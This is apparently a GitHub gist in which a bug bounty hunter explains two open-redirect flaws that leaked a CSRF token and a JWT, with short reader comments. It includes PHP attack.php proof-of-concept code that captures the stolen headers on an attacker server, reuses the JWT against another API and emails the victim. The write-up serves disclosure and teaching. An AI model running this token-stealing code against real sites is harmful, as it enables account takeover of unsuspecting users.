Skip to content

Instantly share code, notes, and snippets.

What would you like to do?

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.

CSRF token bug

  1. There is an open redirect on
  2. User loads
  3. Javascript code in makes a GET request to with a header x-csrf-token set to the CSRF token for the session of the user
    GET /verify/VALUE HTTP/1.1
    x-csrf-token: the-csrf-token-of-the-user
  4. The issue is that if the user loads, the application makes the GET request of step 3 to, follows the redirection, and the x-csrf-token ends up being sent in a GET request to
  5. attack.php stores the value of x-csrf-token or does anything that is necessary for the attack
      // These headers are specific to this request.
      // Open your web browser Console whenever you are testing a similar issue
      // to check if there is any CORS issues that you have to fix in your response.
      header('Access-Control-Allow-Origin: *');
      header('Access-Control-Allow-Headers: x-requested-with,x-csrf-token');
      foreach (getallheaders() as $key => $value) {
        if ($key == 'x-csrf-token') {
          $token_file = fopen('csrf_token.txt', 'w');
          fwrite($token_file, $value);
    For my proof of concept, I took the value of x-csrf-token and made changes to the profile of the user/victim on

JWT bug

  1. There is an open redirect on This open redirect was different because first I had to make a request to another endpoint with the URL to which I wanted to redirect, and the "reference" value was returned in the response. Once I had that reference value, any request to by any user, redirected to the URL I had sent in the first request.
  2. User loads
  3. Javascript code makes a GET request to with the header Authorization set to Bearer JWT-of-the-authenticated-user
    GET /check/VALUE/please HTTP/1.1
    Authorization: Bearer JWT-of-the-authenticated-user
  4. The issue is that the attacker can create a redirect to, and when the user loads (%26 is equal to & once decoded, which was necessary to remove "/please" from the value of "reference"), the application makes a GET request to which redirects to with the JWT in the Authorization header
  5. attack.php stores the JWT or does anything that is possible with it
      header('Access-Control-Allow-Origin: *');
      header('Access-Control-Allow-Headers: authorization');
      foreach (getallheaders() as $key => $value) {
        if ($key == 'Authorization') {
          $opts = array(
               'header'=>'Authorization: '.$value
         $context = stream_context_create($opts);
         $file = file_get_contents('', false, $context);
         $fh = fopen('out.txt', 'w');
         fwrite($fh, $file);
         $json = json_decode($file, true);
         $sent = mail($json['email'], 'Hi '.$json['name'], 'Your user id is '.$json['id'], 'From:');
         if ($sent) {
            echo 'Email sent';
         } else {
            echo 'Couldn\'t send email';
    For my proof of concept, I took the JWT, got information about the user/victim from other API which accepted the same JWT in the Authorization header, and sent an email to the user/victim. The previous code is exactly what I used as proof of concept.


It is been a long time since I shared something that could be useful for new bug bounty hunters, I hope it is useful.

Copy link

After three years, I say thank you for this. Always share, sooner or later it will help somebody. Cheers.

Copy link

@Th3redTea you're welcome! I'm still finding bugs like this one. So, it's worth the time looking for them.
I haven't written anything in a long time because most bugs I found are well documented. If I find something interesting that is not well documented, I will write about it.
Thank you for taking the time to comment with a "thank you".

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment